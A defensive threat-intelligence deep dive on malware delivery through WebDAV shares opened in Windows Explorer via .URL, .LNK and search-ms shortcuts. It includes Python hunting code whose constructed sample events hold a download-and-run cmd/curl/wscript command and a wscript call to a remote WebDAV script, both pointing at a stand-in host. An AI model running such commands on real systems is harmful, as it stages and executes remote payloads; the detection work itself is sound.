WebDAV Delivery via Windows File Explorer: How .URL and .LNK Shortcuts Stage Malware Outside the Browser

Short title: Deep dive on Explorer-native WebDAV abuse for malware delivery
Keywords: WebDAV, Windows File Explorer, WebClient, TryCloudflare, Cloudflare Tunnel, phishing, .URL, .LNK, search-ms, Mark-of-the-Web, SmartScreen, RAT delivery, detection engineering


Executive Summary

Cofense’s 25 February 2026 reporting details a growing tactic where threat actors abuse Windows File Explorer’s native ability to browse WebDAV resources to deliver malware without a traditional browser download workflow. (cofense.com)

In these campaigns, phishing emails routinely deliver (or link to) Windows Internet Shortcut files (.URL) and Windows Shortcut files (.LNK) that open a remote WebDAV share in Explorer and fetch additional scripts and payloads. Cofense notes it observed this tradecraft as early as February 2024, with campaign volume rising from September 2024 and remaining consistent since. (cofense.com)

Proofpoint independently described a closely aligned delivery chain in August 2024, where .URL files connect to external WebDAV shares to stage LNK/VBS, which then chain BAT/CMD and Python installers/scripts to deploy RAT payloads. (Proofpoint)

The defensive challenge is not just the delivery mechanism, but the user experience: Explorer presents remote content as a familiar folder view, while short-lived infrastructure is frequently fronted by legitimate services such as Cloudflare Tunnel demo subdomains on trycloudflare[.]com. (cofense.com)


Context and Timeline

From niche behaviour to repeatable commodity tradecraft

The “open a folder” deception sits at the intersection of several trends:

  • Windows-native handlers as an initial access surface. Trellix documented adversary abuse of the search-ms protocol handler in July 2023, where victims are redirected to a remote server and Windows Explorer displays attacker-hosted results as if they were local search hits. (trellix.com)
  • Cloud-based proxying and infrastructure churn. Proofpoint described increased abuse of TryCloudflare tunnels in 2024, emphasising that each tunnel generates a random subdomain and proxies traffic through Cloudflare’s network to the operator’s local server. (Proofpoint)
  • WebDAV’s awkward place in Windows trust boundaries. Microsoft lists the WebClient (WebDAV) service as deprecated (November 2023) and notes it is not started by default, but the capability persists in many estates and remains accessible when enabled or triggered. (Microsoft Learn)

Observed activity milestones

  • 26 July 2023: Trellix publishes “Beyond File Search”, describing search-ms abuse that can point Windows Explorer at WebDAV-style locations and present malicious shortcuts disguised as trusted icons. (trellix.com)
  • February 2024: Cofense reports first observing WebDAV-in-Explorer delivery tradecraft in its dataset. (cofense.com)
  • May to July 2024: Proofpoint reports increased campaign activity abusing TryCloudflare tunnels to stage WebDAV payload delivery chains. (Proofpoint)
  • September 2024 onward: Cofense reports a sustained increase and continued baseline level of activity. (cofense.com)
  • 25 February 2026: Cofense summarises the technique as a “constant threat”, with consistent patterns in lures, staging and final payloads. (cofense.com)

Why WebDAV-in-Explorer Works

Explorer is not “the internet” in most users’ mental model

Cofense’s central observation is that many users simply do not know Explorer can browse internet-hosted resources. That lack of awareness lets attackers reframe a download as routine file browsing, sidestepping browser-centric security controls because the browser is never involved. (cofense.com)

Once a user is inside a WebDAV-backed Explorer window, the interface is familiar: file icons, folders, double-click execution. Cofense notes the address bar may be the only clear indicator that the content is remote, showing an IP address or a domain name rather than a local path. (cofense.com)

WebDAV is legacy, but still usable (and therefore abusable)

Cofense describes WebDAV as a file management protocol over HTTP that was historically common for file transfers before modern cloud storage became dominant. Its advantage for attackers is that it “just works” over HTTP(S) and can be accessed by common tooling and Windows-native components. (cofense.com)

Microsoft’s deprecation of WebClient does not mean WebDAV disappears immediately; it means reduced investment and eventual removal, which can leave defenders with a long tail of environments where the functionality remains available but is poorly monitored. (Microsoft Learn)


Technical Breakdown: The Attack Chain

The WebDAV delivery pattern is best understood as a set of interchangeable building blocks. In practice, operators mix and match based on what their target environment will allow through email filtering, URL rewriting, endpoint controls and user training.

Step 1: Phishing delivers a “bridge” file or link

Most observed cases begin with a phishing message delivering either an attachment or a link that leads to an initial shortcut artefact, most commonly a .URL file. Proofpoint explicitly states that in most campaigns, the message contains a URL or attachment leading to an internet shortcut (.URL). (Proofpoint)

MITRE ATT&CK mapping: T1566.001 (Spearphishing Attachment) and T1566.002 (Spearphishing Link); see the lifecycle table below. (attack.mitre.org)

Step 2: The shortcut opens WebDAV content inside Explorer

WebDAV addressing formats defenders should recognise

Cofense highlights two common ways WebDAV resources are referenced:

  1. URL-style paths that resemble normal web links (conceptually like https://exampledomain/My_Files/) (cofense.com)
  2. UNC-style paths where DavWWWRoot indicates the WebDAV root, for example:
    • \\exampledomain\DavWWWRoot\My_Files
Cofense also notes two important wrinkles in UNC usage:

  • By default, UNC-style access uses HTTP over port 80.
  • @SSL and explicit ports can force HTTPS, for example:
    • \\exampledomain@443\DavWWWRoot\My_Files
    • \\exampledomain@SSL\DavWWWRoot\My_Files (cofense.com)

These strings are useful hunting pivots, especially DavWWWRoot and @SSL, because they are uncommon in normal corporate workflows unless WebDAV is explicitly in use.

.URL files: small, trusted-looking, and highly abusable

Cofense provides examples where the .URL file’s URL field uses the file:// scheme to open a remote WebDAV folder in Explorer, rather than opening a web page in a browser. (cofense.com)

Cofense also notes .URL files can be crafted to open a specific remote file on a WebDAV server, including scripts, which is particularly useful for driving execution without obvious “download” behaviour. (cofense.com)

MITRE ATT&CK mapping: user execution is central here, because the chain relies on double-click behaviour and social engineering. T1204.002 (attack.mitre.org)
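The addressing formats and .URL fields described above lend themselves to a small normaliser that a mail gateway or triage script can apply before an analyst opens the file. The Python below is an added example written for this page, not code from Cofense or any other vendor cited here. It handles the UNC forms shown above (and the @SSL@port variant, which Windows accepts but the page does not show), file:// URLs as carried in a .URL file, plain http(s) URLs (which a .URL file hands to a browser rather than Explorer) and the search-ms crumb=location: form discussed later in the page. The host exampledomain and the two sample .URL bodies are constructed.

```python
"""Normalise WebDAV references found in .URL files, UNC strings and search-ms URIs.
Added example for this page; exampledomain and the sample .URL bodies are constructed."""
import configparser
import re
from urllib.parse import parse_qs, urlsplit

# \\host[@SSL][@port]\path  -- @SSL and @port are only meaningful to the WebDAV redirector
DAV_UNC = re.compile(
    r"^\\\\(?P<host>[^\\@\s]+)"      # \\host
    r"(?P<ssl>@SSL)?"                # optional @SSL marker
    r"(?:@(?P<port>\d{1,5}))?"       # optional @port (e.g. @443 or @SSL@8443)
    r"\\(?P<path>.*)$", re.IGNORECASE)


def parse_webdav_ref(ref):
    """Return a dict describing a UNC, file://, http(s):// or search-ms reference, or None."""
    ref = ref.strip()
    low = ref.lower()
    if low.startswith("search-ms:"):
        # search-ms:query=...&crumb=location:<remote path>&displayname=...
        for crumb in parse_qs(ref.split(":", 1)[1]).get("crumb", []):
            if crumb.lower().startswith("location:"):
                parsed = parse_webdav_ref(crumb[len("location:"):])
                if parsed:
                    parsed["markers"].append("search-ms:crumb")
                return parsed
        return None
    if low.startswith("file:"):
        parts = urlsplit(ref)
        if not parts.netloc:                      # file:///C:/... stays local
            return {"kind": "local_file", "host": None, "scheme": None, "port": None,
                    "path": parts.path, "webdav": False, "markers": []}
        # file://host/share/... is handed to the shell as \\host\share\...
        ref = "\\\\" + parts.netloc + parts.path.replace("/", "\\")
    m = DAV_UNC.match(ref)
    if m:
        host, port_s, path = m.group("host"), m.group("port"), m.group("path")
        markers = []
        if m.group("ssl"):
            markers.append("@SSL")
        if port_s:
            markers.append("@" + port_s)
        https = bool(m.group("ssl")) or port_s == "443"   # Cofense: @SSL or @443 forces HTTPS
        segments = [s for s in path.split("\\") if s]
        dav_root = bool(segments) and segments[0].lower() == "davwwwroot"
        if dav_root:
            markers.append(segments.pop(0))
        webdav = dav_root or bool(markers)                 # plain \\host\share may still be SMB
        return {"kind": "unc", "host": host,
                "scheme": ("https" if https else "http") if webdav else None,
                "port": (int(port_s) if port_s else (443 if https else 80)) if webdav else None,
                "path": "/" + "/".join(segments), "webdav": webdav, "markers": markers}
    parts = urlsplit(ref)
    if parts.scheme in ("http", "https") and parts.hostname:
        return {"kind": "url", "host": parts.hostname, "scheme": parts.scheme,
                "port": parts.port or (443 if parts.scheme == "https" else 80),
                "path": parts.path or "/", "webdav": None, "markers": []}
    return None


def scan_url_file(text):
    """Parse a .URL (INI-style) body and report the remote references in its fields."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str                       # keep 'URL' / 'IconFile' casing
    cp.read_string(text)
    fields = dict(cp["InternetShortcut"]) if cp.has_section("InternetShortcut") else {}
    findings = {}
    for key in ("URL", "IconFile", "WorkingDirectory"):
        parsed = parse_webdav_ref(fields[key]) if key in fields else None
        if parsed and parsed["kind"] != "local_file":
            findings[key] = parsed
    url = findings.get("URL")
    return {
        "findings": findings,
        # file:// and UNC targets are handed to the shell (Explorer), not to a browser
        "remote_explorer_open": bool(url and url["kind"] == "unc"),
        "webdav_markers": sorted({mk for f in findings.values() for mk in f["markers"]}),
        "hosts": sorted({f["host"] for f in findings.values() if f["host"]}),
    }


# Constructed sample .URL bodies (not captured from a real campaign)
SAMPLE_URL_EXPLORER = r"""[InternetShortcut]
URL=file://exampledomain@SSL/DavWWWRoot/My_Files/
IconIndex=3
IconFile=C:\Windows\System32\shell32.dll
"""
SAMPLE_URL_BROWSER = r"""[InternetShortcut]
URL=https://exampledomain/My_Files/
"""

if __name__ == "__main__":
    for body in (SAMPLE_URL_EXPLORER, SAMPLE_URL_BROWSER):
        print(scan_url_file(body))
```

The useful output fields are the host list (for DNS and proxy correlation), the markers (DavWWWRoot, @SSL, @port and search-ms:crumb are the hunting pivots the page names) and the remote_explorer_open flag, which separates a shortcut that will open Explorer on a remote share from one that merely opens a browser.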

A subtle interaction signal: directory browsing can cause network traffic

One of the most operationally interesting points in the Cofense write-up is that .URL files written with UNC-style paths may trigger repeated DNS lookups and outbound connection attempts simply when Explorer browses a directory containing the shortcut. Cofense notes this behaviour can effectively “ping” attacker infrastructure and potentially signal victim interaction. (cofense.com)

For defenders, this suggests a valuable correlation opportunity: Explorer directory enumeration followed by DNS queries for unusual external domains can be a strong early-stage signal, even before payload execution.

Step 3: .LNK files and script hosts execute the next stage

Cofense notes .LNK shortcuts are particularly powerful because they can embed commands executed by a specified program, not just point to a file or folder. This lets attackers use LNKs to either open a WebDAV path in Explorer or directly invoke script execution from a remote WebDAV share. (cofense.com)

Cofense shows examples where LNKs invoke wscript.exe against a remote WebDAV-hosted script using a UNC path that includes @SSL and DavWWWRoot. (cofense.com)

Cofense further demonstrates a common pattern: the LNK invokes cmd.exe, downloads a script to %TEMP% using a built-in transfer utility, then executes it via Windows Script Host. (cofense.com)

MITRE ATT&CK mapping: T1059.003 (Windows Command Shell), T1059.005 (Visual Basic) and T1105 (Ingress Tool Transfer); see the lifecycle table below. (attack.mitre.org)

Step 4: Multi-stage payload delivery, commonly RAT-led

Cofense reports that since it first observed this tactic in February 2024, almost all associated reports ended in a RAT payload, and 87% delivered multiple RAT families, naming XWorm, AsyncRAT and DcRAT among the most common. (cofense.com)

Proofpoint similarly states the activity delivers exclusively RATs and provides a representative chain where .URL → WebDAV → LNK/VBS → BAT/CMD → Python installer/scripts → RAT. (Proofpoint)

This multi-payload approach matters operationally: it can create resilience against partial detection (one payload blocked, another succeeds) and increases the chance of establishing a foothold even if one stage fails.


The search-ms Pivot: WebDAV Without a WebDAV-Looking Link

Cofense’s analysis focuses on Explorer and WebDAV links, but Proofpoint and Trellix both highlight a closely related initial access surface: the Windows Search protocol handlers (search / search-ms).

What Trellix observed

Trellix describes a technique where malicious JavaScript on a web page triggers a search-ms query whose “crumb” parameter points to a remote server location using WebDAV-style UNC formatting including @SSL and DavWWWRoot. (trellix.com)

The key deception is visual: Trellix notes that remote malicious shortcut files can appear in Explorer search results “disguised as PDFs or other trusted icons”, creating an illusion that the files are local. (trellix.com)

Trellix also documents interaction mechanics defenders can hunt for at the network layer: after the user accepts an “Open Windows Explorer” prompt, the victim host may issue WebDAV-related HTTP methods such as OPTIONS and PROPFIND to enumerate and retrieve remote content. (trellix.com)

Finally, Trellix notes that if the technique is invoked from script files (Batch, PowerShell, Visual Basic, PHP, Office macro variants), the user may not see the same “Open Windows Explorer” alert, reducing friction and increasing the likelihood of follow-on execution. (trellix.com)

What Proofpoint adds

Proofpoint states that in some cases, file staging leverages the search-ms protocol handler to retrieve an LNK from a WebDAV share, and that benign PDFs are commonly displayed as decoys to appear legitimate. (Proofpoint)

Taken together, this suggests a broader pattern: attackers are not committed to “WebDAV links” as such. They are committed to getting Windows to render attacker-controlled remote content inside Explorer, where user trust is higher and conventional browser controls are less relevant.


Infrastructure: Why TryCloudflare Keeps Appearing

Cloudflare Tunnel “Quick Tunnels” align with attacker needs

Cofense reports that, as of its February 2026 publication date, all associated examples in its dataset used Cloudflare Tunnel demo accounts on trycloudflare[.]com to host WebDAV servers, and that the instances were short-lived and often removed quickly once a campaign was detected. (cofense.com)

Cloudflare’s own documentation explains why this is attractive: TryCloudflare (Quick Tunnels) generates a random subdomain on trycloudflare.com and proxies requests through Cloudflare’s network back to a local web server running on the operator’s machine. (Cloudflare Docs)

Proofpoint reinforces the operational impact for defenders: randomised subdomains and proxying through a reputable service reduce the effectiveness of static blocklists and increase the burden on behavioural detection. (Proofpoint)

The trend persists beyond the 2024 window

Securonix’s June 2025 reporting on SERPENTINE#CLOUD describes a phishing chain using .lnk files to fetch remote payloads hosted on Cloudflare Tunnel subdomains, with multiple scripting stages (batch, VBScript, Python) leading to in-memory execution. (Securonix)

Even where WebDAV is not explicitly the delivery mechanism in every case, the repeatable theme is clear: ephemeral tunnels plus shortcut-led execution chains remain attractive to multiple criminal operators.


Trust Controls and the Mark-of-the-Web Problem

Even when WebDAV delivery does not rely on a specific vulnerability, it benefits from longstanding complexity in how Windows applies “internet origin” trust controls across different file acquisition paths.

MoTW is not consistently applied across WebDAV workflows

Trend Micro’s ZDI research into CVE-2024-38213 (Copy2Pwn) explicitly focuses on how files originating from WebDAV shares can end up locally without expected Mark-of-the-Web protections through copy-and-paste operations, and notes that Windows has historically treated WebDAV shares more like SMB shares than HTTP web servers. (www.trendmicro.com)

ZDI also notes it observed threat actors using the Windows search protocol to open WebDAV searches through Windows Explorer, which directly overlaps with the Trellix and Proofpoint observations around search-ms. (www.trendmicro.com)

Related exploited CVEs defenders should track (context, not the core technique)

These CVEs are relevant because they show sustained attacker interest in reducing SmartScreen and MoTW friction around shortcuts and downloaded content:

  • CVE-2024-21412 (Internet Shortcut Files security feature bypass)
    NVD lists a CVSS v3.1 base score of 8.1 (High) and notes it is in CISA’s Known Exploited Vulnerabilities (KEV) catalogue. (nvd.nist.gov)
  • CVE-2024-38213 (MoTW / SmartScreen security feature bypass)
    NVD lists a CVSS v3.1 base score of 6.5 (Medium) and indicates KEV inclusion (date added 13 August 2024). (nvd.nist.gov)
  • CVE-2024-38217 (MoTW protection mechanism failure)
    NVD lists a CVSS v3.1 base score of 5.4 (Medium) and indicates KEV inclusion (date added 10 September 2024). (nvd.nist.gov)

The takeaway for defenders: WebDAV-in-Explorer delivery can be dangerous on its own, but it becomes materially worse when paired with MoTW and SmartScreen bypass conditions that reduce user-visible warnings or weaken post-download protections.


Detection and Hunting Guidance (No IOC List)

This section intentionally avoids enumerating campaign-specific indicators (especially trycloudflare subdomains) because they are high-churn by design and Cofense’s write-up is example-driven rather than IOC-driven. Cofense itself emphasises behavioural detection and user awareness. (cofense.com)

1) Email security controls

Prioritise prevention of the “bridge” artefacts:

  • High-risk attachment types: .url, .lnk, .vbs, .wsf, .wsh, .js, .hta, plus archive-wrapped variants. This aligns with both Cofense and Proofpoint’s descriptions of shortcut-first chains that then pivot into scripts. (cofense.com)
  • HTML attachment risk: Proofpoint describes HTML attachments that contain search-ms queries pointing to LNK files. Trellix similarly describes HTML and PDF variants that trigger search-ms. (Proofpoint)

2) Endpoint telemetry: what “good” looks like, and what does not

Key behavioural pivots:

  • Explorer spawning script hosts or shells is generally high-signal in office-user contexts, especially where the execution chain involves WSH and command shells (for example explorer.exe → wscript.exe or explorer.exe → cmd.exe). Cofense demonstrates LNK-driven execution via wscript.exe and shell utilities. (cofense.com)
  • Shortcut execution followed by file staging to %TEMP% or Downloads: Proofpoint’s chains commonly involve helper scripts and staged Python installers/scripts. (Proofpoint)
  • Unusual WebDAV access patterns: creation of WebDAV mapped connections, Explorer navigation to external domains, or sudden WebClient service activation where it is normally disabled.
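The Step 3 chains and the Explorer-to-script-host and Explorer-to-shell pivots listed above can be expressed as three parent/child rules over process-creation telemetry. The Python below is an added example for this page, not detection content from Cofense or Proofpoint; it runs over a constructed set of events whose fields are Sysmon-like but simplified (pid, parent pid, image basename, command line). The set of built-in transfer utilities to watch (curl.exe, certutil.exe, bitsadmin.exe) is an assumption, as Cofense only says "a built-in transfer utility".

```python
"""Hunt a process-creation event set for Explorer-initiated WebDAV script chains.
Added example: the events below are constructed, not real Sysmon or EDR telemetry."""
import re
from dataclasses import dataclass

# UNC forms only the WebDAV redirector understands: @SSL / @port markers, or a DavWWWRoot segment
WEBDAV_UNC = re.compile(r"(?i)\\\\[^\\@\s]+(?:@ssl|@\d{1,5}){1,2}\\|\\\\[^\\\s]+\\davwwwroot\\")
TEMP_PATH = re.compile(r"(?i)%temp%|\\appdata\\local\\temp\\")
HTTP_URL = re.compile(r"(?i)https?://")

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
TRANSFER_UTILS = {"curl.exe", "certutil.exe", "bitsadmin.exe"}   # assumed set of built-in helpers


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str      # image basename, lower-case
    cmdline: str


def ancestry(procs, pid):
    """Image names from the process itself up to the root; stops on missing parents or cycles."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid].image)
        pid = procs[pid].ppid
    return chain


def hunt(events):
    """Return (pid, rule) pairs for events matching the Explorer-WebDAV execution patterns."""
    procs = {p.pid: p for p in events}
    hits = []
    for p in events:
        chain = ancestry(procs, p.pid)
        parent = chain[1] if len(chain) > 1 else None
        under_explorer = "explorer.exe" in chain[1:]
        # Rule 1: Explorer (a double-clicked LNK) launches a script host against a WebDAV UNC path
        if p.image in SCRIPT_HOSTS and parent == "explorer.exe" and WEBDAV_UNC.search(p.cmdline):
            hits.append((p.pid, "explorer_script_host_webdav_unc"))
        # Rule 2: a shell under Explorer drives a transfer utility to stage a file in %TEMP%
        elif (p.image in TRANSFER_UTILS and under_explorer and parent in SHELLS
              and HTTP_URL.search(p.cmdline) and TEMP_PATH.search(p.cmdline)):
            hits.append((p.pid, "explorer_shell_staging_to_temp"))
        # Rule 3: a script host under Explorer then executes something out of %TEMP%
        elif p.image in SCRIPT_HOSTS and under_explorer and TEMP_PATH.search(p.cmdline):
            hits.append((p.pid, "script_host_runs_staged_temp_file"))
    return sorted(hits)


# Constructed events: host.example, the paths and the pids are invented for the example
EVENTS = [
    Proc(100, 1,   "explorer.exe", r"C:\Windows\explorer.exe"),
    # LNK target: wscript.exe against a script on a WebDAV share
    Proc(200, 100, "wscript.exe",  r"wscript.exe \\host.example@SSL\DavWWWRoot\docs\Invoice.vbs"),
    # LNK target: cmd.exe downloads to %TEMP% with curl.exe (assumed utility) then runs it via WSH
    Proc(300, 100, "cmd.exe",      r"cmd.exe /c curl.exe -o %TEMP%\inv.vbs https://host.example/inv.vbs & wscript.exe %TEMP%\inv.vbs"),
    Proc(301, 300, "curl.exe",     r"curl.exe -o C:\Users\u\AppData\Local\Temp\inv.vbs https://host.example/inv.vbs"),
    Proc(302, 300, "wscript.exe",  r"wscript.exe C:\Users\u\AppData\Local\Temp\inv.vbs"),
    # benign noise that must not fire
    Proc(400, 100, "cmd.exe",      "cmd.exe /c dir"),
    Proc(500, 900, "wscript.exe",  r"wscript.exe C:\Scripts\logon.vbs"),   # parent is not under Explorer
    Proc(600, 100, "outlook.exe",  "OUTLOOK.EXE"),
]

if __name__ == "__main__":
    for pid, rule in hunt(EVENTS):
        print(pid, rule)
```

Rule 1 fires on the wscript.exe/UNC pattern Cofense shows, rules 2 and 3 together cover the cmd.exe download-then-execute pattern, and the two cmd.exe events themselves never fire: the signal is in the children and the ancestry, not in the shell launch, which keeps ordinary Explorer-spawned shells out of the alert queue.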

3) Network telemetry: WebDAV methods and tunnel patterns

At the protocol layer, defenders should consider:

  • WebDAV HTTP verbs such as OPTIONS and PROPFIND, which Trellix explicitly observed as part of search-ms-initiated remote enumeration before retrieving a malicious shortcut via GET. (trellix.com)
  • trycloudflare[.]com baselining: Cloudflare documents that TryCloudflare generates random subdomains and proxies traffic through Cloudflare’s network to a localhost server. Proofpoint and Cofense both highlight that adversaries are abusing this behaviour. (Cloudflare Docs)
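At the proxy, the two bullets above combine into one correlation: WebDAV enumeration verbs and the WebClient service's user agent on a session to a host that is either a trycloudflare subdomain or simply not a sanctioned WebDAV server. The Python below is an added example for this page (not Trellix's, Cofense's or Cloudflare's tooling). The log line format, the safelisted host and the log lines themselves are constructed; the "Microsoft-WebDAV-MiniRedir" prefix is the user agent the Windows WebClient service presents.

```python
"""Correlate WebDAV verbs, the WebClient user agent and trycloudflare hosts in proxy logs.
Added example; the log lines are constructed and the line format is assumed."""
import re
from collections import defaultdict

# Assumed proxy format: <timestamp> <client_ip> <method> <host> <path> <status> "<user-agent>"
LINE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')
DAV_METHODS = {"OPTIONS", "PROPFIND"}
SHORTCUT_OR_SCRIPT = re.compile(r"(?i)\.(lnk|url|vbs|vbe|js|wsf|hta|bat|cmd)$")
WEBCLIENT_UA = "Microsoft-WebDAV-MiniRedir"           # UA prefix of the Windows WebClient service
SAFELISTED_WEBDAV_HOSTS = {"sharepoint.example.com"}   # assumed: hosts where WebDAV use is sanctioned

# Constructed log lines (the trycloudflare subdomain is invented, not an observed indicator)
LOGS = """\
2026-02-25T10:01:02Z 10.0.0.5 OPTIONS abc-def-ghi.trycloudflare.com /My_Files/ 200 "Microsoft-WebDAV-MiniRedir/10.0.19045"
2026-02-25T10:01:02Z 10.0.0.5 PROPFIND abc-def-ghi.trycloudflare.com /My_Files/ 207 "Microsoft-WebDAV-MiniRedir/10.0.19045"
2026-02-25T10:01:05Z 10.0.0.5 GET abc-def-ghi.trycloudflare.com /My_Files/Invoice.lnk 200 "Microsoft-WebDAV-MiniRedir/10.0.19045"
2026-02-25T10:02:00Z 10.0.0.7 GET www.example.com /index.html 200 "Mozilla/5.0"
2026-02-25T10:03:00Z 10.0.0.9 PROPFIND sharepoint.example.com /sites/docs/ 207 "Microsoft-WebDAV-MiniRedir/10.0.19045"
2026-02-25T10:03:01Z 10.0.0.9 GET sharepoint.example.com /sites/docs/report.docx 200 "Microsoft-WebDAV-MiniRedir/10.0.19045"
"""


def analyse(lines):
    """Group requests per (client, host) and return the pairs that warrant triage, with reasons."""
    sessions = defaultdict(lambda: {"seq": [], "webclient_ua": False})
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue                            # blank line or a line in another format
        _ts, client, method, host, path, _status, ua = m.groups()
        s = sessions[(client, host.lower())]
        s["seq"].append((method.upper(), path))
        if ua.startswith(WEBCLIENT_UA):
            s["webclient_ua"] = True
    findings = {}
    for (client, host), s in sessions.items():
        reasons = []
        dav_seen = False
        # enumeration (OPTIONS/PROPFIND) followed by a GET of a shortcut or script from the same host
        for method, path in s["seq"]:
            if method in DAV_METHODS:
                dav_seen = True
            elif method == "GET" and dav_seen and SHORTCUT_OR_SCRIPT.search(path):
                reasons.append("webdav_enumeration_then_shortcut_fetch")
                break
        if s["webclient_ua"] and host.endswith(".trycloudflare.com"):
            reasons.append("webclient_to_trycloudflare")
        if dav_seen and s["webclient_ua"] and host not in SAFELISTED_WEBDAV_HOSTS:
            reasons.append("webclient_dav_to_non_safelisted_host")
        if reasons:
            findings[(client, host)] = reasons
    return findings


if __name__ == "__main__":
    for (client, host), reasons in analyse(LOGS.splitlines()).items():
        print(client, host, ", ".join(reasons))
```

The safelist is the point: the sharepoint session in the sample shows the same verbs and user agent as the malicious one, so verb-only alerting would page on every legitimate WebDAV user. Keying on host reputation (tunnel domain, not safelisted) plus the enumerate-then-fetch sequence keeps the sanctioned traffic quiet.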

4) Response playbook highlights

When you suspect Explorer-WebDAV delivery:

  1. Quarantine the initial artefacts: preserve the .url / .lnk and the container it arrived in (email, ZIP, HTML attachment).
  2. Reconstruct the process tree from Explorer into script hosts and download utilities.
  3. Identify staged payload locations (commonly user Downloads and %TEMP%, per Cofense and Proofpoint examples). (cofense.com)
  4. Scope by behaviour, not just indicators: look for the same parent-child execution patterns and WebDAV enumeration sequences across endpoints.

MITRE ATT&CK Mapping (Observed Lifecycle)

Tactic | Technique ID | Technique name | Observed behaviour in this pattern
Initial Access | T1566.001 | Spearphishing Attachment | Delivery of shortcut artefacts and archive-wrapped variants (Proofpoint)
Initial Access | T1566.002 | Spearphishing Link | Links to .URL retrieval or handler-driven staging (Proofpoint)
Execution | T1204.002 | User Execution: Malicious File | Double-clicking .URL/.LNK and follow-on staged files (Proofpoint)
Execution | T1059.003 | Windows Command Shell | LNK-driven shell execution for download-and-run chains (cofense.com)
Execution | T1059.005 | Visual Basic | VBS/WSH stages described in Proofpoint and related reporting (Proofpoint)
Defence Evasion | T1553.005 | Mark-of-the-Web Bypass | WebDAV and related trust-control edge cases reduce warning friction (contextual risk) (www.trendmicro.com)
Command and Control | T1105 | Ingress Tool Transfer | Staging additional scripts and payloads from remote shares (Proofpoint)
Command and Control | T1071.001 | Web Protocols | WebDAV over HTTP(S), tunnelled via Cloudflare (trellix.com)
Command and Control | T1090 | Proxy | Cloudflare Tunnel proxying to operator-hosted services (Cloudflare Docs)

Technique IDs and names as listed at attack.mitre.org.

Mitigation Recommendations

Reduce the exposed surface area

  • Validate whether WebDAV is actually required. Microsoft lists WebClient (WebDAV) as deprecated and not started by default; if your business does not require WebDAV, keeping it disabled reduces the opportunity for Explorer-native WebDAV abuse. (Microsoft Learn)
  • Constrain access to external file shares. Proofpoint recommends restricting access to external file sharing services to known, safelisted servers due to increased criminal use of WebDAV and SMB for staging. (Proofpoint)
  • Treat TryCloudflare as a high-risk category. Cloudflare’s own docs describe randomised subdomains and proxying to localhost, which aligns closely with attacker needs for disposable infrastructure. (Cloudflare Docs)

Make user awareness more concrete than “don’t click links”

Cofense’s mitigation guidance is unusually practical: train users to treat Explorer’s address bar like a browser address bar, and distrust unfamiliar external domains that do not resemble local drives or known file shares. (cofense.com)

That guidance is valuable precisely because it targets the psychological trick this technique relies on.

Keep MoTW and SmartScreen defences current

Even if you do not see active exploitation of specific MoTW bypass CVEs in your environment today, NVD’s documentation of KEV inclusion for multiple related bypass issues reinforces that attackers actively pursue friction reduction around shortcut-delivered payloads. (nvd.nist.gov)

Consider protocol handler hardening (with care)

Trellix documents a direct mitigation for disabling search / search-ms handlers via registry deletion commands. This can be disruptive and should be tested, but it highlights that protocol handler governance is a real defensive lever for this class of attack. (trellix.com)


Historical Context and Related Research

  • TryCloudflare and RAT delivery (2024): Proofpoint’s analysis remains a foundational reference for tunnel-driven staging chains. (Proofpoint)
  • search-ms exploitation (2023): Trellix provides an early, detailed look at Explorer-rendered remote results and WebDAV enumeration behaviours. (trellix.com)
  • WebDAV and MoTW edge cases (2024): ZDI’s Copy2Pwn research explicitly ties WebDAV acquisition paths to Mark-of-the-Web handling failures and notes threat actor use of Windows search protocols to access WebDAV shares through Explorer. (www.trendmicro.com)
  • Ecosystem-level visibility: BleepingComputer’s coverage of TryCloudflare abuse helps contextualise how widely discussed and replicated the technique became once public reporting accelerated. (BleepingComputer)

GCVE context: the GCVE project publishes a directory and describes a broader effort to improve open vulnerability intelligence correlation, which may be useful for defenders building enrichment pipelines. (gcve.eu)


Future Outlook

Expect this tradecraft to persist and evolve along three predictable lines:

  1. More handler-led delivery: As defenders harden against obvious attachments, attackers will continue pivoting to Windows-native protocol handlers and UI flows that feel “local” to users, as already seen with search-ms. (trellix.com)
  2. Infrastructure churn as a default: Randomised, disposable tunnel subdomains will remain attractive for staging because they undermine static blocklisting and complicate rapid triage. (Cloudflare Docs)
  3. Multi-stage, multi-payload chains: Cofense’s observation that 87% of its associated reports delivered multiple RAT families suggests operators increasingly optimise for resilience rather than elegance. (cofense.com)

Further Reading

  • Cofense reporting on Explorer-WebDAV malware delivery (cofense.com)
  • Proofpoint reporting on TryCloudflare tunnel abuse and WebDAV staging (Proofpoint)
  • Trellix research on search-ms abuse and Explorer-rendered remote results (trellix.com)
  • Cloudflare documentation on TryCloudflare Quick Tunnels (Cloudflare Docs)
  • Trend Micro ZDI research on Copy2Pwn (CVE-2024-38213) and WebDAV MoTW implications (www.trendmicro.com)
  • NVD entries documenting exploited MoTW and shortcut-related bypass CVEs (nvd.nist.gov)